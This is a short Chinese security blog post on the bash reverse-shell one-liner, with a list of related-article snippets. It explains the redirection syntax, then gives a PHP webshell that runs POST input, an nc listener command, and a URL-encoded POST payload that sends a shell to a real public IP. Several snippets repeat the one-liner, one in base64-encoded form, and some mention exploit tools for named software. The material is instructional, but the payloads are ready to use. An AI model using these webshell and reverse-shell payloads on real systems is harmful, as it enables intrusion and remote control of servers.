反弹shell

最新推荐文章于 2024-05-23 22:06:50 发布
最新推荐文章于 2024-05-23 22:06:50 发布
阅读量390 收藏 1
点赞数
分类专栏: web安全学习 文章标签: 反弹shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_40491569/article/details/84674564
版权

反弹shell语句 

bash -i >& /dev/tcp/ip/port 0>&1

这句的意思是  首先将标准输出重定向/dev/tcp/ip/port也就是远程 然后再把标准输入重定向远程。

然后就可以在远程输入输出了

其中ip必须为公网Ip

bash -i  在本地产生一个交互的bash环境

>&的含义

当>&后面接文件时,是将标准输出和标准错误输出重定向此文件

当>& 后面接文件描述符时,是将>&前面的文件描述符重定向>&后面的文件描述符

linxux下的文件描述符有

0 代表标准输入 <或<<

1 代表标准输出  >或>>

2  代表标准错误输出  2>或2>>

下面附一个php代码进行反弹shell利用

<?php
exec($_POST['a']);
?>

首先在公网ip的终端输入  nc -lvp 7 监听端口7接受连接

post数据: a=bash%20-i%20%3E%26%20%2fdev%2ftcp%2f123.207.51.206%2f7%200%3E%261

成功反弹

参考链接

https://www.freebuf.com/articles/system/178150.html

内网渗透-信息收集
weixin_47696216的博客
11-03 4569
00 信息收集的方向 1. 主机存活探测 2. 主机端口开放情况 3. 主机服务探测 4. 主机操作系统探测 5. 网段分布情况 6. 漏洞信息探测 7. 主机内部信息搜集/域内信息搜集 01 主机内部信息收集 操作系统默认ttl值 ① WINDOWS NT/2000 TTL:128 ② WINDOWS 95/98 TTL:32 ③ UNIX...
Linux反弹shell总结与实践
不想当脚本小子的脚本小子
12-05 302
最近在学习的时候碰到了利用kali写反弹shell的操作,趁着有空的时候过来系统学习一下。给1.什么情况下需要写入反弹shell。2.如何写入反弹shell 3.反弹shell成功的原理是什么 4.反弹shell有没有什么变形。5.反弹shell有哪些方法? 当我去攻击一台机器的时候,通过该机器的端口以及端口提供的服务(SSH、telnet等等)可以直接去连接到这台机器,但是如果连不上这台机器那就不如让它弹一个shell回来(可以理解为从对方的机器上拿一个控制权到自己手里),比如这个机器在内网里,...
Linux反弹shell命令语句解析
Lee_Natuo的博客
12-07 936
Linux反弹shell命令语句 语句格式 bash -i &amp;amp;gt;&amp;amp;amp; /dev/tcp/[ip]/[port] 0&amp;amp;gt;&amp;amp;amp;1 bash -i 打开bash &amp;amp;amp;后面跟 /dev/tcp/[ip]/[port] (相当于&amp;amp;gt;&amp;amp;amp;后面接文件)将bash的标准输出和标准错误输出传递到远
Linux反弹shell方式总结
qq_43936524的博客
12-11 1323
文章目录bash反弹基础知识指令分析 bash反弹 反弹指令: bash -i >& /dev/tcp/ip/port 0>&1 反弹步骤: 在kail上开启7777侦听: nc -lvp 7777 在靶机上输入反弹指令即可反弹成功 基础知识 linux下有三个标准的文件描述符: 0 - stdin 代表标准输入,使用<或<< 1 - stdout 代表标准输出,使用>或>> 2 - stderr 代表标准错误输出,使用2>或2>
nc反弹bash中 &>、0>&1是什么意思
smile_3779的博客
05-23 864
本文结合一些参考文章以及作者个人理解解释Linux的bash反弹命令中的 &>、0>&1若观点有误,欢迎指出!目标讨论命令:bash -i >& /dev/tcp/ip/port 0>&1。
反弹shell总结
weixin_44576725的博客
04-26 4797
反弹shell 在介绍反弹链接的时候先说明什么是正向链接:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。而反弹shell是指攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。本质上是网络概念的客户端与服务端的角色反转。反弹shell简单来说就是通过命令让靶机的shell的控制权交到攻击者的机器中。 可能有人会问:我们都能够在靶机
shell 反弹
m0_66458291的博客
12-04 544
反弹shell是我们开启一个端口进行监听,转而让服务器主动反弹一个shell来连接我们的主机,我们再通过接收到的shell进而来远程控制服务器。**对于一台主机来说对于入站流量往往检测比较严格,但是出站流量比较宽松,为此,我们在进行权限获取的时候,往往会进行shell反弹获取 对方的shell权限**在这种情况下,它重定向到网络中的另一台机器,IP地址为。反弹shell的方式也有很多,但是往往需要一些环境的限制,一般情况下为了可以保证shell的正常反弹,我们使用bash命令反弹
网络安全基础入门反弹SHELL与正反向连接技术:防火墙绕过及文件下载命令详解
最新发布
04-22
内容概要:本文档主要介绍了基础入门级别的反弹SHELL、不回显带外、正反向连接、防火墙出入站规则以及文件下载等技术。涵盖Web常规、Web其他、Web拓展、APP架构、小程序架构等方面的知识点。详细讲解了渗透命令如...
XXL-JOB反弹shell利用工具(xxl-jobExploitGUI)
11-03
工具实现了XXL-JOB默认accessToken权限绕过漏洞的单个检测、批量检测、一键反弹shell功能,后续会持续更新优化,添加POC检测等。(由于传播、利用此资源所提供的信息或者工具而造成的任何直接或者间接的后果及损失,...
Spring cloud function SpEL RCE批量检测脚本,反弹shell脚本
03-30
Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和...反弹shell脚本:python Spel_RCE_Bash_EXP.py url lhost lport 受影响版本:3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2
Apache-flink 未授权访问任意jar包上传反弹shell.MD
04-12
Apache-flink 未授权访问任意jar包上传反弹shell
php反弹shell实现代码
10-30
作者想要简化操作流程,因此选择实现了一个反弹Shell到本地监听端口的功能。文档中还提到该代码是在phpspy2008的基础上进行修改,使其成为一个独立的PHP文件,并且上传到服务器上之后,通过设置好反弹的IP和端口来...
反弹shell原理简析与病毒脚本案例
Alexz__的博客
03-20 893
1,Linux中文件描述符 2,Linux输入输出重定向 3,反弹shell作用与目的 4,基础反弹shell语句的本质 5,反弹shell多种方式(命令行,php,python,java,nc) 壹 Linux中的文件描述符 首先我们需要回顾一下Linux系统的一个特点:一切皆文件 所有不同种类的类型都被抽象成了文件;如:普通文件、目录、字符设备、块设备、套接字等 当一...
Linux反弹shell学习
paidx0
09-06 1677
前言 当我们可以在远程Linux主机上执行任意命令或写入任意的数据到任意的文件的时候 通常会通过反弹一个shell 来控制远程主机 bash 反弹shell Linux反弹shell使用这条命令,但反弹回来的shell是不可交互的 bash -i >& /dev/tcp/10.10.10.134/2333 0>&1 也可以{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjI3LzQ0NDQgMD4mMSA=}|{base64,-
linux反弹shell命令解析
原味瓜子、的博客
09-29 2344
文章目录1. 什么是反弹shell2. 反弹shell的用途3. 反弹shell操作步骤4. 原理 1. 什么是反弹shell 简单来说就是A主机可以通过执行B主机上的命令并且把返回值都返回到A上。 2. 反弹shell的用途 这个反弹shell大部分用途是用来侵入别人的主机。就是因为感觉很厉害的样子,所以才来研究这家伙 3. 反弹shell操作步骤 3.1. 在本机开启端口9090 nc -lk 9090 3.2. 在需要被控制的机器上执行如下两种命令中的一种即可 bash -i >& /
【学习笔记】反弹shell命令学习笔记,实战指南,1v1攻击测试教学,常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1
qq_37092496的博客
03-15 9219
文章目录 前言 为何给靶机发送这条执行命令就会自动连接到本地计算机,并且出发实时通讯机制(ps:有点类似oicq,前生就是用的这种模式开发的即时通讯) 作为渗透测试人员必备技能,反弹shell到底是什么原理,以及如何使用,本文是自己学习shell命令时的个人感悟和笔记,文章内容大量引入了较为官方的语言,给入门渗透学习的人员提供一个参考1 常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1 何为shell Shell 脚本(
Linux命令——bash
weixin_34007906的博客
11-12 673
bash是一个命令解释语言,能够执行读取标准输入或文件的命令,可以执行命令以及结合nc进行反弹shell! 基本使用语法 1 bash-c命令 1 2 3 root@kali:~#bash-cwhoami root root@kali:~# 另外使用-i表示以交互方式运...
辨别Linux下的>,>>,>&与&>以及反弹shell语句的理解
Just for funnnnnnnnnnnn
01-06 3188
前言 今天看到在Linux中反弹shell时,对常用的反弹shell语句产生了好奇。 bash -i >& /dev/tcp/[ip]/[port] 0>&1 其实理解它最关键的地方还是在与对于几个看上去相似的符号的理解。 我写下来对于它们的看法,不对的地方请大家帮忙斧正。 文件描述符 有三种标准的文件描述符: 0 - stdin 标准输入 1 - stdout 标准输出 2
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值